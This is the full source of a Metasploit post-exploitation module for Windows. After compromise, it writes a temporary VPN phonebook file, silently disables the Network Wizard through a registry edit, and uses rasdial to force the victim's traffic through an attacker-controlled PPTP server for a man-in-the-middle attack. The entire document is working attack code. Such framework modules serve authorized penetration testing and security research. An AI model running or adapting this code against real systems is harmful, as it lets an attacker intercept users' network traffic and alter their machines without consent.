Path: blob/master/modules/post/windows/manage/pptp_tunnel.rb
27558 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::Priv8include Msf::Post::Windows::Registry910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Manage Remote Point-to-Point Tunneling Protocol',15'Description' => %q{16This module initiates a PPTP connection to a remote machine (VPN server). Once17the tunnel is created we can use it to force the victim traffic to go through the18server getting a man in the middle attack. Be sure to allow forwarding and19masquerading on the VPN server (mitm).20},21'License' => MSF_LICENSE,22'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',23'References' => [24[ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ],25[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]26],27'Platform' => 'win',28'SessionTypes' => [ 'meterpreter' ],29'Notes' => {30'Stability' => [CRASH_SAFE],31'SideEffects' => [CONFIG_CHANGES],32'Reliability' => []33}34)35)3637register_options(38[39OptString.new('USERNAME', [true, 'VPN Username.' ]),40OptString.new('PASSWORD', [true, 'VPN Password.' ]),41OptBool.new('MITM', [true, 'Man in the middle.', true]),42OptInt.new('TIMEOUT', [true, 'Timeout for the tunnel creation.', 60]),43OptString.new('PBK_NAME', [true, 'PhoneBook entry name.', 'MSF']),44OptAddress.new('VPNHOST', [true, 'VPN server.'])45]46)47end4849def run50version = get_version_info51disable_network_wizard if version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win7_SP1)5253pbk = create_pbk(datastore['MITM'], datastore['PBK_NAME'])54to = (datastore['TIMEOUT'] <= 0) ? 60 : datastore['TIMEOUT']55begin56::Timeout.timeout(to) do57run_rasdial(pbk, datastore['USERNAME'], datastore['PASSWORD'], datastore['VPNHOST'], datastore['PBK_NAME'])58end59rescue ::Timeout::Error60print_error("Timeout after #{to} seconds")61end62file_rm(pbk)63print_status('Phonebook deleted')64end6566def disable_network_wizard67if !is_admin?68print_error("You don't have enough privileges to change the registry. Network Wizard will not be disabled")69return70end7172key = 'HKLM\\System\\CurrentControlSet\\Control\\Network'73value = 'NewNetworkWindowOff'74begin75if !registry_getvaldata(key, value)76registry_setvaldata(key, value, 3, 'REG_BINARY')77print_good('Network Wizard disabled')78end79rescue StandardError => e80print_status("The following error was encountered: #{e.class} #{e}")81end82end8384def create_pbk(mim, pbk_name)85pbk_dir = expand_path('%TEMP%')86pbk_file = pbk_dir << '\\' << Rex::Text.rand_text_alpha(6..13) << '.pbk'8788conf_conn = "[#{pbk_name}]\r\n\r\n"89conf_conn += "MEDIA=rastapi\r\n"90conf_conn += "Port=VPN4-0\r\n"91conf_conn += "DEVICE=vpn\r\n"92conf_conn += "IpPrioritizeRemote=0\r\n" unless mim9394if write_file(pbk_file, conf_conn)95print_good("PhoneBook configuration written to #{pbk_file}")96return pbk_file97end98end99100def run_rasdial(pbk, user, pass, vpn_host, pbk_name)101print_status('Establishing connection ...')102cmd_exec('rasdial', '/disconnect')103output_run = cmd_exec('rasdial', "#{pbk_name} #{user} #{pass} /PHONE:#{vpn_host} /PHONEBOOK:#{pbk}")104output_view = cmd_exec('rasdial', nil)105106if output_view =~ /#{pbk_name}/i107print_good('Connection Successful')108else109print_error("Connection failure: #{output_run}")110end111end112end113114115